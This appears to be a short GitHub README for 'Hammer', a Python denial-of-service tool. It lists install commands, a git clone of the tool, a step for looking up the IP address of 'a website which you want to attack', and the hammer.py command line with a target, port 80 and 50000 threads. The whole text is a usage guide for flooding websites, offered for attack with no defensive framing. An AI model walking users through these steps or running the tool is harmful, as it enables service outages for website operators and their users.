/hammar

ddos attack

Primary LanguagePython

$ apt update
$ apt upgrade
$ apt install python
$ apt install git
$ apt install dnsutils
$ git clone https://github.com/cyberanand1337x/Hammer/

Hammer need the Name Server of a website which you want to attack...
To get the Name Server...just type
$ nslookup example.com
Note the IP Address of that Website

then
$ cd Hammer
$ python3 hammer.py -s 127.0.0.1 -p 80 -t 50000
example:
$ python hammer.py -s [your ip] -p 80 -t 50000